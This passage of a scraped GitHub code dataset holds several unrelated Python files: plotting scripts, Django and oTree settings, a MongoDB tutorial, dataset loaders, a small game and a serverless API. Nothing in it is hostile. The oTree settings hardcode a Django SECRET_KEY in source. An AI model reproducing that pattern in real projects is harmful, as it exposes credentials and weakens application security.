1\n fig, ax = plt.subplots()\n im = ax.imshow(field, interpolation=\"spline16\", extent=[0, d, 0, d], cmap=\"jet\")\n clb = fig.colorbar(im)\n clb.ax.set_title(\"U (m/s)\")\n ax.set_title(\"U Field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/u_field.png\")\n elif filename == \"y\":\n field = np.flip(np.reshape(field, (ncells, ncells)), axis=0)\n fig, ax = plt.subplots()\n im = ax.imshow(field, interpolation=\"spline16\", extent=[0, d, 0, d], cmap=\"jet\")\n clb = fig.colorbar(im)\n clb.ax.set_title(\"V (m/s)\")\n ax.set_title(\"V Field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/v_field.png\")\n elif filename == \"z\":\n field = np.pad(np.flip(np.reshape(field, (ncells, ncells)), axis=0), (1,1))\n fig, ax = plt.subplots()\n im = ax.imshow(field, interpolation=\"spline16\", extent=[0, d, 0, d], cmap=\"jet\")\n clb = fig.colorbar(im)\n clb.ax.set_title(\"Z (m/s)\")\n ax.set_title(\"Z Field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/z_field.png\")\n else:\n field = np.flip(np.reshape(field, (ncells, ncells)), axis=0) * 1000\n fig, ax = plt.subplots()\n im = ax.imshow(field, interpolation=\"spline16\", extent=[0, d, 0, d], cmap=\"jet\")\n clb = fig.colorbar(im)\n clb.ax.set_title(\"P (Pa)\")\n ax.set_title(\"Pressure field\")\n plt.savefig(f\"Results/{SIM}/SIM {SIM_num}/p_field.png\")\n\n return ax\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--SIM_num\",\n type=int\n )\n\n args = parser.parse_args()\n\n SIM_num = args.SIM_num\n ncells = 40\n\n u_field = ReadFile(f\"Results/{SIM}/SIM {SIM_num}/u_field.txt\")\n v_field = ReadFile(f\"Results/{SIM}/SIM {SIM_num}/v_field.txt\")\n z_field = ReadFile(f\"Results/{SIM}/SIM {SIM_num}/z_field.txt\")\n p_field = ReadFile(f\"Results/{SIM}/SIM {SIM_num}/p_field.txt\")\n res_SIMPLE = ReadFile2(f\"Results/{SIM}/SIM {SIM_num}/res_SIMPLE.txt\")\n resx_momentum = ReadFile2(f\"Results/{SIM}/SIM {SIM_num}/resx_momentum.txt\")\n resy_momentum = ReadFile2(f\"Results/{SIM}/SIM {SIM_num}/resy_momentum.txt\")\n res_pressure = ReadFile2(f\"Results/{SIM}/SIM {SIM_num}/res_pressure.txt\")\n\n velocity_ax = velocity_field_plot(u_field, v_field, z_field, SIM_num, ncells, 0.1)\n plt.close()\n pressure_ax = field(p_field, SIM_num, ncells, 0.1, \"p\")\n plt.close()\n u_ax = field(u_field, SIM_num, ncells, 0.1, \"x\")\n plt.close()\n v_ax = field(v_field, SIM_num, ncells, 0.1, \"y\")\n plt.close()\n z_ax = field(z_field, SIM_num, ncells, 0.1, \"z\")\n plt.close()\n SIMPLE_convergence(res_SIMPLE, SIM_num)\n plt.close()\n momentum_convergence(resx_momentum, resy_momentum, SIM_num)\n plt.close()\n pressure_convergence(res_pressure, SIM_num)\n","repo_name":"paddywardle/SIMPLE-Based_Steady-State_Solver","sub_path":"plots/plot_script.py","file_name":"plot_script.py","file_ext":"py","file_size_in_byte":7321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"70575076889","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nimport json\nfrom bdem import msgutil\n\nimport settings\nfrom eaglet.decorator import param_required\nfrom eaglet.utils.resource_client import Resource\n\nfrom db.mall import models as mall_models\nfrom db.mall import promotion_models\nfrom db.account import models as account_models\nfrom business.account.user_profile import UserProfile\nfrom business import model as business_model\nfrom eaglet.core import watchdog\nfrom eaglet.core.exceptionutil import unicode_full_stack\n\n\n\nfrom business.decorator import cached_context_property\nfrom business.product.property_template.product_template_property import ProductTemplateProperty\nfrom business.mall.corporation_factory import CorporationFactory\n\n\nclass ProductPropertyTemplate(business_model.Model):\n\t\"\"\"\n\t商品属性模板\n\t\"\"\"\n\t__slots__ = (\n\t\t'id',\n\t\t'name',\n\t\t'created_at'\n\t)\n\n\t@staticmethod\n\t@param_required(['model'])\n\tdef from_model(args):\n\t\tmodel = args['model']\n\t\tproperty_template = ProductPropertyTemplate(model)\n\n\t\treturn property_template\n\n\tdef __init__(self, model=None):\n\t\tbusiness_model.Model.__init__(self)\n\n\t\tif model:\n\t\t\tself._init_slot_from_model(model)\n\n\t@property\n\tdef properties(self):\n\t\t\"\"\"\n\t\t获取template中的template_property对象集合\n\t\t\"\"\"\n\t\tmodels = mall_models.TemplateProperty.select().dj_where(template_id=self.id)\n\n\t\ttemplate_properties = []\n\t\tfor property_model in models:\n\t\t\ttemplate_properties.append(ProductTemplateProperty.from_model({\n\t\t\t\t'model': property_model\n\t\t\t}))\n\n\t\treturn template_properties\n\n\tdef update(self, params):\n\t\t\"\"\"\n\t\t更新模板\n\n\t\tArgs:\n title: 属性模板标题\n new_properties: 需要新建的property集合\n update_properties: 需要更新的property集合\n deleted_property_ids: 需要删除的property的id集合\n\t\t\"\"\"\n\t\tcorp = CorporationFactory.get()\n\t\ttemplate_id = self.id\n\n\t\t#更新template name\n\t\tname = params['title']\n\t\tmall_models.ProductPropertyTemplate.update(name=name).dj_where(owner_id=corp.id, id=template_id).execute()\n\n\t\t#更新已存在的template property\n\t\tupdate_properties = params['update_properties']\n\t\tfor template_property in update_properties:\n\t\t\tmall_models.TemplateProperty.update(name=template_property['name'], value=template_property['value']).dj_where(owner_id=corp.id, template_id=template_id, id=template_property['id']).execute()\n\n\t\t#创建新的template property\n\t\tnew_properties = params['new_properties']\n\t\tfor template_property in new_properties:\n\t\t\tmall_models.TemplateProperty.create(\n\t\t\t\towner = corp.id,\n\t\t\t\ttemplate = template_id,\n\t\t\t\tname = template_property['name'],\n\t\t\t\tvalue = template_property['value']\n\t\t\t)\n\n\t\t#删除需要删除的template property\n\t\tdeleted_property_ids = params['deleted_property_ids']\n\t\tmall_models.TemplateProperty.delete().dj_where(owner_id=corp.id, template_id=template_id, id__in=deleted_property_ids).execute()\n\n\t@staticmethod\n\tdef create(params):\n\t\tcorp = params['corp']\n\t\tname = params['title']\n\t\tproperties = params['new_properties']\n\n\t\ttemplate = mall_models.ProductPropertyTemplate.create(\n\t\t\towner = corp.id,\n\t\t\tname = name\n\t\t)\n\n\t\tfor template_property in properties:\n\t\t\tmall_models.TemplateProperty.create(\n\t\t\t\towner = corp.id,\n\t\t\t\ttemplate = template,\n\t\t\t\tname = template_property['name'],\n\t\t\t\tvalue = template_property['value']\n\t\t\t)","repo_name":"chengdg/gaia","sub_path":"business/product/property_template/product_property_template.py","file_name":"product_property_template.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25335695735","text":"\"\"\"\nFrom:\nhttps://matplotlib.org/3.1.1/gallery/images_contours_and_fields/image_annotated_heatmap.html\n\nAccessed:\n2020-07-31\n\"\"\"\n\n\"\"\"\n===========================\nCreating annotated heatmaps\n===========================\n\nIt is often desirable to show data which depends on two independent\nvariables as a color coded image plot. This is often referred to as a\nheatmap. If the data is categorical, this would be called a categorical\nheatmap.\nMatplotlib's :meth:`imshow ` function makes\nproduction of such plots particularly easy.\n\nThe following examples show how to create a heatmap with annotations.\nWe will start with an easy example and expand it to be usable as a\nuniversal function.\n\"\"\"\n\n\n##############################################################################\n#\n# A simple categorical heatmap\n# ----------------------------\n#\n# We may start by defining some data. What we need is a 2D list or array\n# which defines the data to color code. We then also need two lists or arrays\n# of categories; of course the number of elements in those lists\n# need to match the data along the respective axes.\n# The heatmap itself is an :meth:`imshow ` plot\n# with the labels set to the categories we have.\n# Note that it is important to set both, the tick locations\n# (:meth:`set_xticks`) as well as the\n# tick labels (:meth:`set_xticklabels`),\n# otherwise they would become out of sync. The locations are just\n# the ascending integer numbers, while the ticklabels are the labels to show.\n# Finally we can label the data itself by creating a\n# :class:`~matplotlib.text.Text` within each cell showing the value of\n# that cell.\n\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n# sphinx_gallery_thumbnail_number = 2\n\n\n#############################################################################\n# Using the helper function code style\n# ------------------------------------\n#\n# As discussed in the :ref:`Coding styles `\n# one might want to reuse such code to create some kind of heatmap\n# for different input data and/or on different axes.\n# We create a function that takes the data and the row and column labels as\n# input, and allows arguments that are used to customize the plot\n#\n# Here, in addition to the above we also want to create a colorbar and\n# position the labels above of the heatmap instead of below it.\n# The annotations shall get different colors depending on a threshold\n# for better contrast against the pixel color.\n# Finally, we turn the surrounding axes spines off and create\n# a grid of white lines to separate the cells.\n\n\ndef heatmap(data, row_labels=None, col_labels=None, ax=None,\n cbar_kw={}, cbarlabel=\"\", **kwargs):\n \"\"\"\n Create a heatmap from a numpy array and two lists of labels.\n\n Parameters\n ----------\n data\n A 2D numpy array of shape (N, M).\n row_labels\n A list or array of length N with the labels for the rows.\n col_labels\n A list or array of length M with the labels for the columns.\n ax\n A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If\n not provided, use current axes or create a new one. Optional.\n cbar_kw\n A dictionary with arguments to `matplotlib.Figure.colorbar`. Optional.\n cbarlabel\n The label for the colorbar. Optional.\n **kwargs\n All other arguments are forwarded to `imshow`.\n \"\"\"\n\n if not ax:\n ax = plt.gca()\n\n # Plot the heatmap\n im = ax.imshow(data, **kwargs)\n\n # Create colorbar\n cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)\n cbar.ax.set_ylabel(cbarlabel, rotation=-90, va=\"bottom\")\n\n # We want to show all ticks...\n ax.set_xticks(np.arange(data.shape[1]))\n ax.set_yticks(np.arange(data.shape[0]))\n # ... and label them with the respective list entries.\n \n if col_labels is not None:\n ax.set_xticklabels(col_labels)\n else:\n ax.get_xaxis().set_ticks([])\n if row_labels is not None:\n ax.set_yticklabels(row_labels)\n else:\n ax.get_yaxis().set_ticks([])\n\n # Let the horizontal axes labeling appear on top.\n ax.tick_params(top=True, bottom=False,\n labeltop=True, labelbottom=False)\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=-30, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Turn spines off and create white grid.\n for edge, spine in ax.spines.items():\n spine.set_visible(False)\n\n ax.set_xticks(np.arange(data.shape[1]+1)-.5, minor=True)\n ax.set_yticks(np.arange(data.shape[0]+1)-.5, minor=True)\n ax.grid(which=\"minor\", color=\"w\", linestyle='-', linewidth=3)\n ax.tick_params(which=\"minor\", bottom=False, left=False)\n\n return im, cbar\n\n\ndef annotate_heatmap(im, data=None, valfmt=\"{x:.2f}\",\n textcolors=[\"black\", \"white\"],\n threshold=None, **textkw):\n \"\"\"\n A function to annotate a heatmap.\n\n Parameters\n ----------\n im\n The AxesImage to be labeled.\n data\n Data used to annotate. If None, the image's data is used. Optional.\n valfmt\n The format of the annotations inside the heatmap. This should either\n use the string format method, e.g. \"$ {x:.2f}\", or be a\n `matplotlib.ticker.Formatter`. Optional.\n textcolors\n A list or array of two color specifications. The first is used for\n values below a threshold, the second for those above. Optional.\n threshold\n Value in data units according to which the colors from textcolors are\n applied. If None (the default) uses the middle of the colormap as\n separation. Optional.\n **kwargs\n All other arguments are forwarded to each call to `text` used to create\n the text labels.\n \"\"\"\n\n if not isinstance(data, (list, np.ndarray)):\n data = im.get_array()\n\n # Normalize the threshold to the images color range.\n if threshold is not None:\n threshold = im.norm(threshold)\n else:\n threshold = im.norm(data.max())/2.\n\n # Set default alignment to center, but allow it to be\n # overwritten by textkw.\n kw = dict(horizontalalignment=\"center\",\n verticalalignment=\"center\")\n kw.update(textkw)\n\n # Get the formatter in case a string is supplied\n if isinstance(valfmt, str):\n valfmt = matplotlib.ticker.StrMethodFormatter(valfmt)\n\n # Loop over the data and create a `Text` for each \"pixel\".\n # Change the text's color depending on the data.\n texts = []\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n kw.update(color=textcolors[int(im.norm(data[i, j]) > threshold)])\n text = im.axes.text(j, i, valfmt(data[i, j], None), **kw)\n texts.append(text)\n\n return texts","repo_name":"petermattia/revisit-severson-et-al","sub_path":"image_annotated_heatmap.py","file_name":"image_annotated_heatmap.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"31"} +{"seq_id":"74665337048","text":"#conding:utf-8\nfrom pymongo import MongoClient\n#建立客户端\nclient = MongoClient('10.58.69.41:27017')\n#连接数据库\ndb = client.nerData\n#删除集合 db.collection.drop()\n\n\n#连接表名 如果不存在,会自动创建\ncollection = db.Test\n#catid = fircat + \"_\" + seccat + \"_\" + thrcat+\"_\"+firid+\"_\"+thrCatid;\n#展示所有数据库\nprint(db.dbs)\n\n#插入\n#collection.insert({\"name\":\"菜鸟\"})\n#删除 数据库\n#db.dropDatabase()\n#遍历所有条数\n#for product in collection.find():\n#更新 update()\n\ncollection.update({'name':'菜鸟'},{'name':'MongoDB'})\n\n\n#删除文档\ncollection.insert({\"title\": 'MongoDB 教程',\n \"description\": 'MongoDB 是一个 Nosql 数据库',\n \"by\": '菜鸟教程',\n \"url\": 'http://www.runoob.com',\n \"tags\": ['mongodb', 'database', 'NoSQL'],\n \"likes\": 100\n })\n\ncollection.remove({'title':'MongoDB 教程'})\n\n#查询文档\n'''\nMongoDB 查询文档使用find() 方法 以非结构的方法来显示所有文档\ndb.collection.find(query,projection)\nquery 可选,使用查询操作符指定查询条件 \nprojection 可选\n如果你需要以易读的方式来读取数据,可以使用pretty()方法\n\ndb.col.find().pretty()\n\n\n'''\nprint(dir(collection))\nprint(collection.find_one())\n\n\n'''\nMongoDB 中的条件 查询\n等于 {:}\n小于\t{:{$lt:}}\t db.col.find({\"likes\":{$lt:50}}).pretty()\t\n小于或等于\t{:{$lte:}}\t db.col.find({\"likes\":{$lte:50}}).pretty()\t\n大于\t{:{$gt:}}\t db.col.find({\"likes\":{$gt:50}}).pretty()\t\n大于或等于\t{:{$gte:}}\t db.col.find({\"likes\":{$gte:50}}).pretty()\t\n不等于\t{:{$ne:}}\t db.col.find({\"likes\":{$ne:50}}).pretty()\n'''\n#不加 list 返回的是 游标,而不是 具体的数据\nprint(list(collection.find({\"firstCatId\" : \"cat31665542\"})))\n\n\n# MongoDB 条件操作符\n'''\n大于 $gt $lt $ gte $lte \n为了使用方便,我们可以先使用一下命令清空集合\n'''\ncollection.remove({})\n#插入一下数据\ncollection.insert({\n \"title\": 'PHP 教程',\n \"description\": 'PHP 是一种创建动态交互性站点的强有力的服务器端脚本语言。',\n \"by\": '菜鸟教程',\n \"url\": 'http://www.runoob.com',\n \"tags\": ['php'],\n \"likes\": 200\n})\n\ncollection.insert({\n \"title\": 'Java 教程',\n \"description\": 'Java 是由Sun Microsystems公司于1995年5月推出的高级程序设计语言。',\n \"by\": '菜鸟教程',\n \"url\": 'http://www.runoob.com',\n \"tags\": ['java'],\n \"likes\": 150\n })\n\ncollection.insert({\n \"title\": 'MongoDB 教程',\n \"description\": 'MongoDB 是一个 Nosql 数据库',\n \"by\": '菜鸟教程',\n \"url\": 'http://www.runoob.com',\n \"tags\": ['mongodb'],\n \"likes\": 100\n })\n\nprint( list(collection.find( {\"likes\":{\"$gt\" : 100}} )) )\n#联合查询\nprint( list(collection.find( {\"likes\":{\"$gt\" : 100,\"$lt\" : 200}} )) )\n\n#MongoDB $type 操作符\n\n#如果想获取 \"col\" 集合中 title 为 String 的数据,你可以使用以下命令:\ncollection.find({\"title\" : {\"$type\" : 2}})\n\n#MongoDB 中读取指定数量的数据记录,可以使用MongoDB 的 limit方法,\nprint(\"limit \",list(collection.find().limit(1)))\n\n#MongoDB sort() 方法 sort() 方法可以通过参数指定排序的字段,并使用 1 和 -1 来指定排序的方式\n#其中1 为升序,-1 位降序\n\nprint(\"sort:\",list(collection.find().sort('likes',-1)))\n\n\n###MongoDB 索引 索引通常能够极大的提高查询的效率,如果没有索引,MongoDB在读取数据时必须扫描集中中每个文件并选取那些\n#符合查询条件的记录是非常耗时的\n#索引是特殊的数据结构,索引存储在一个易于遍历读取的数据集合中,索引是对数据库表中一列或多列的值 进行排序的一种结构\n\n# create_index() 方法来创建索引 1为指定按升序创建索引,如果你想按降序来创建索引指定为-1即可。\n#之前的老方法 ensureindex() 已经不用了\ncollection.create_index([(\"likes\",1)])\n\n#mongoDB 聚合 (aggregate)\n\n\n\n\n\n\n\n","repo_name":"LawLietzh/workspacePy","sub_path":"py/py_tool/pythonMongo/LianxiMongo.py","file_name":"LianxiMongo.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18706516138","text":"import os\nfrom unittest import TestCase\nfrom stdf_utils import OpenFile, StdfRecord\n\n\nclass TestStdfRecord(TestCase):\n def setUp(self) -> None:\n self.f = os.path.abspath(os.path.join(__file__, os.pardir, \"data\", \"lot3.stdf.gz\"))\n\n def test_stdf_record_open_file(self):\n with OpenFile(self.f) as f_in:\n for i, (rec_type, record) in enumerate(StdfRecord(f_in)):\n print(i, rec_type, record)\n if i > 100:\n break\n\n","repo_name":"peterjcwu/stdf-utils","sub_path":"tests/test_stdf_record.py","file_name":"test_stdf_record.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6193881780","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('articles', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='articulo',\n name='imagen_destacada',\n field=models.ImageField(default='default.jpg', upload_to='main_pics/'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='articulo',\n name='estado',\n field=models.CharField(default='p', choices=[('b', 'borrador'), ('p', 'publicado')], max_length=1),\n ),\n migrations.AlterField(\n model_name='categoria',\n name='slug',\n field=models.SlugField(blank=True, null=True, editable=False),\n ),\n ]\n","repo_name":"pythoncali/django_cali","sub_path":"articles/migrations/0002_auto_20150526_1438.py","file_name":"0002_auto_20150526_1438.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38785994234","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 22 14:30:09 2018\r\n\r\n@author: keen_liu\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\n但是,如果要部署到服务器时,通常需要修改数据库的host等信息,直接修改config_default.py不是一个好办法,\r\n更好的方法是编写一个config_override.py,用来覆盖某些默认设置:\r\n\r\n\"\"\"\r\n\r\nconfigs = {\r\n 'db': {\r\n 'host': '127.0.0.1' #改为服务器地址\r\n }\r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"keennnn/webapp_keen","sub_path":"www/config_override.py","file_name":"config_override.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30094111964","text":"from os import environ\n\n# if you set a property in SESSION_CONFIG_DEFAULTS, it will be inherited by all configs\n# in SESSION_CONFIGS, except those that explicitly override it.\n# the session config can be accessed from methods in your apps as self.session.config,\n# e.g. self.session.config['participation_fee']\n\nSESSION_CONFIG_DEFAULTS = {\n 'real_world_currency_per_point': 1,\n 'participation_fee': 0,\n 'doc': \"\",\n}\n\nSESSION_CONFIGS = [\n {\n 'name': 'FHM',\n 'display_name': \"FHM\",\n 'num_demo_participants': 2,\n 'app_sequence': ['hausladen_FHM']\n },\n]\n\n\nLANGUAGE_CODE = 'de'\nREAL_WORLD_CURRENCY_CODE = 'EUR'\nUSE_POINTS = False\n\nROOMS = [\n dict(\n name='Xlab',\n display_name='Xlab@FUB',\n participant_label_file='Xlab.txt'\n ),\n]\n\nADMIN_USERNAME = 'admin'\nADMIN_PASSWORD = environ.get('OTREE_ADMIN_PASSWORD')\nDEMO_PAGE_INTRO_HTML = \"\"\" \"\"\"\n\nSECRET_KEY = '=s#7s$6+9hrhhsh+x$#u_awkkic$m_h@6g0duap!j%))xsmjr*'\n\n# if an app is included in SESSION_CONFIGS, you don't need to list it here\nINSTALLED_APPS = ['otree']\n","repo_name":"carinahausladen/PredictingCompliance","sub_path":"oTree_Experiment/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9765104086","text":"import random\n\nfrom honty_mall.door import Door\nfrom honty_mall.terminal_service import TerminalService\n\nclass Stage():\n \"\"\"\n The stage class presents 3 doors and contains actions performed under the direction of the director. Utilizes three doors and terminal service.\n\n self._terminal_service: The service that collects input and prints to the console.\n self._doors: A list containing 3 doors.\n self._chosen_door: A number [1,2,3] used to determine the first door selected.\n self._stay_or_switch: Input from the user ('s' or a number [1,2,3]) containing their second decision.\n self._remaining_doors: (comes later) A list containing the two doors that were not selected in the first decision.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n The Constructor method for the Stage class.\n\n self: The Stage class.\n \"\"\"\n\n self._terminal_service = TerminalService()\n self._doors = [Door(), Door(), Door()]\n self._stay_or_switch = False\n \n # Set indeces for the doors that makes sense to the player [1,2,3]\n i = 1\n for door in self._doors:\n door.set_index(i)\n i += 1\n \n # Place a car behind one of the doors\n special_door = random.choice(range(3))\n self._doors[special_door].set_as_surprise()\n\n def present_stage(self):\n \"\"\"\n Calls all doors to show themselves to the player\n\n self: The Stage class.\n \"\"\"\n\n for door in self._doors:\n door.present()\n \n def choose_door(self, index):\n \"\"\"\n Chooses a door not to open yet. Opens another door that does not reveal the car.\n\n self: The Stage class.\n index: An integer [1,2,3] that the player selected to represent their chosen door.\n \"\"\"\n \n # Set self._remaining_doors to be the two doors that were not chosen\n self._remaining_doors = self._doors[:index - 1] + self._doors[index:]\n \n # choose one of the other doors\n door_to_maybe_open = random.choice(self._remaining_doors)\n \n # check to see if the car is behind that door\n if door_to_maybe_open.check_if_surprise():\n\n # if so, choose the other door and open it\n list(set(self._remaining_doors) - set([door_to_maybe_open]))[0].open()\n \n # if not, open the door\n elif door_to_maybe_open.check_if_surprise() == False:\n door_to_maybe_open.open()\n \n def make_it_or_break_it(self, index):\n \"\"\"\n The action that determines the second and final choice of the player: should they open the door they chose or switch to open the other remaining closed door? Possible answers are an integer [1,2,3] that matches their chosen door, or the letter 's' to represent 'switch'.\n\n self: The Stage class.\n index: The integer [1,2,3] player-friendly index that represents their first chosen door, which is still closed.\n \"\"\"\n \n self._stay_or_switch = self._terminal_service.to_switch_or_not_to_switch(f\"You chose door {index}. Do you think you chose the correct door, or would you like to switch?\\nEnter '{index}' to stick with door #{index}, or 's' to switch doors: \", index)\n \n # If they chose to stay with the same door, open it\n if self._stay_or_switch == str(index):\n self._doors[index - 1].open()\n \n # Otherwise, if they chose to switch to the other closed door,\n # find the other closed door and open that one\n elif self._stay_or_switch.lower() == 's':\n if self._remaining_doors[0].check_if_open():\n self._remaining_doors[1].open()\n elif self._remaining_doors[1].check_if_open():\n self._remaining_doors[0].open()\n","repo_name":"chigham/cse210-06","sub_path":"honty_mall/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19639994727","text":"\"\"\"benchmark\"\"\"\nimport os\nimport glob\nfrom data.srdata import SRData\n\n\nclass Benchmark(SRData):\n \"\"\"DIV2K\"\"\"\n def __init__(self, args, name='Set5', train=False):\n super(Benchmark, self).__init__(args, name=name, train=train)\n self.dir_hr = None\n self.dir_lr = None\n\n def _scan(self):\n \"\"\"srdata\"\"\"\n names_hr = sorted(\n glob.glob(os.path.join(self.dir_hr, '*' + self.ext[0])))#glob 查找文件路径,将所有HR文件的图像名进行排序\n names_lr = [[] for _ in self.scale]\n for f in names_hr:\n filename, _ = os.path.splitext(os.path.basename(f))#basename - 返回最后一部分\n for si, s in enumerate(self.scale): #enumberate 构成索引序列 0 - a\n if s != 1:\n scale = s\n names_lr[si].append(os.path.join(self.dir_lr, 'X{}/{}{}' \\\n .format(s, filename, self.ext[1])))#文件地址 X2/1x2.img\n for si, s in enumerate(self.scale):\n if s == 1:\n names_lr[si] = names_hr\n return names_hr, names_lr\n\n\n def _set_filesystem(self, dir_data):\n self.apath = os.path.join(dir_data, 'benchmark', self.args.data_test[0])\n self.dir_hr = os.path.join(self.apath, 'HR')\n self.dir_lr = os.path.join(self.apath, 'LR')\n self.ext = ('.png', '.png')","repo_name":"dmcv-ecnu/MindSpore_ModelZoo","sub_path":"LatticeNet/data/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"31"} +{"seq_id":"10440797118","text":"from http.server import BaseHTTPRequestHandler\nfrom urllib import parse\nimport requests\n\nclass handler(BaseHTTPRequestHandler):\n \n def do_GET(self): \n url_path = self.path \n url_components = parse.urlsplit(url_path) \n query_string_list = parse.parse_qsl(url_components.query) \n dic = dict(query_string_list) \n \n if \"number\" in dic: \n url = 'http://numbersapi.com/'\n url = url + dic['number'] + \"?json\"\n\n print(url)\n req = requests.get(url)\n \n print(req, \"a small string\")\n\n #with this out of the code; you got to the [] for num facts\n data = req.json()\n \n if data.get('text'):\n fact = data.get('text')\n actual_number = data.get('number')\n\n message = str(f\"\"\"\n {actual_number}\n Did you know: {fact} \n\n Refresh to get another random fact about {actual_number}\n \"\"\") \n else: \n message = \"PLEASE PICK A NUMBER.\" \n\n self.send_response(200)\n self.send_header('Content-type', 'text/plain')\n # self.send_header('Content-type', 'application/json')\n self.end_headers() \n\n self.wfile.write(message.encode())\n return \n\n\nif __name__ == \"__main__\":\n\n anything = handler() \n anything.do_Get()\n","repo_name":"bioncabond/serverless","sub_path":"api/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74319646809","text":"r\"\"\"Convert refexp data to the common Pix2Struct format.\n\"\"\"\nimport logging\nimport os\nimport random\nfrom typing import Iterable\n\nfrom absl import app\nfrom absl import flags\nimport apache_beam as beam\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom pix2struct.preprocessing import preprocessing_utils\nimport tensorflow as tf\n\nflags.DEFINE_string(\"data_dir\", None, \"Directory containing the refexp data.\")\n\nflags.DEFINE_string(\n \"image_dir\",\n None,\n \"Directory containing the images referenced in refexp data.\")\n\nflags.DEFINE_integer(\n \"num_negative_samples\",\n 5,\n \"Number of negative samples per instance.\")\n\n\nclass ProcessSplit(beam.PTransform):\n \"\"\"Process split.\"\"\"\n\n def __init__(self, split: str):\n self._split = split\n self._data_dir = flags.FLAGS.data_dir\n self._image_dir = flags.FLAGS.image_dir\n\n def get_image(self, image_id):\n filename = image_id + \".jpg\"\n with tf.io.gfile.GFile(os.path.join(self._image_dir, filename), \"rb\") as f:\n return Image.open(f)\n\n def draw_bounding_box(self, image, candidate_idx, example):\n def _get_coordinate(key, max_value):\n float_val = example.features.feature[key].float_list.value[candidate_idx]\n return round(float_val * max_value)\n image_dims = np.asarray(image).shape\n xmin = _get_coordinate(\"image/object/bbox/xmin\", image_dims[1])\n xmax = _get_coordinate(\"image/object/bbox/xmax\", image_dims[1])\n ymin = _get_coordinate(\"image/object/bbox/ymin\", image_dims[0])\n ymax = _get_coordinate(\"image/object/bbox/ymax\", image_dims[0])\n img_draw = ImageDraw.Draw(image, \"RGBA\")\n img_draw.rectangle(\n xy=((xmin, ymax),\n (xmax, ymin)),\n fill=(0, 0, 255, 0),\n outline=(0, 0, 255, 255))\n return image\n\n def convert_to_tf_examples(self, record_id, record\n ) -> Iterable[tf.train.Example]:\n raw_example = tf.train.Example().FromString(record.numpy())\n record_id = record_id.numpy().item()\n try:\n label = preprocessing_utils.get_int_feature(raw_example,\n \"image/ref_exp/label\")\n num_candidates = int(\n preprocessing_utils.get_float_feature(raw_example,\n \"image/object/num\"))\n query = preprocessing_utils.get_text_feature(raw_example,\n \"image/ref_exp/text\")\n image_id = preprocessing_utils.get_text_feature(raw_example, \"image/id\")\n image = self.get_image(image_id)\n except (IndexError, tf.errors.NotFoundError):\n return\n\n if flags.FLAGS.num_negative_samples and self._split == \"train\":\n num_negative_samples = flags.FLAGS.num_negative_samples\n else:\n num_negative_samples = num_candidates\n\n candidates = list(cand for cand in range(num_candidates) if cand != label)\n random.shuffle(candidates)\n candidates = candidates[:num_negative_samples] + [label]\n for candidate_idx in candidates:\n tf_example = tf.train.Example()\n candidate_image = image.copy()\n candidate_image = self.draw_bounding_box(candidate_image, candidate_idx,\n raw_example)\n candidate_image = preprocessing_utils.render_header(\n candidate_image, query)\n is_correct = label == candidate_idx\n # pix2struct features\n preprocessing_utils.add_bytes_feature(\n tf_example, \"image\",\n preprocessing_utils.image_to_bytes(candidate_image))\n preprocessing_utils.add_text_feature(\n tf_example, \"parse\", str(is_correct).lower())\n preprocessing_utils.add_text_feature(\n tf_example, \"id\", str(f\"{record_id}_{candidate_idx}\"))\n # pix2box features\n preprocessing_utils.add_text_feature(\n tf_example, \"group_id\", str(record_id))\n preprocessing_utils.add_text_feature(\n tf_example, \"candidate_id\", str(candidate_idx))\n yield tf_example\n\n def expand(self, root):\n data_path = 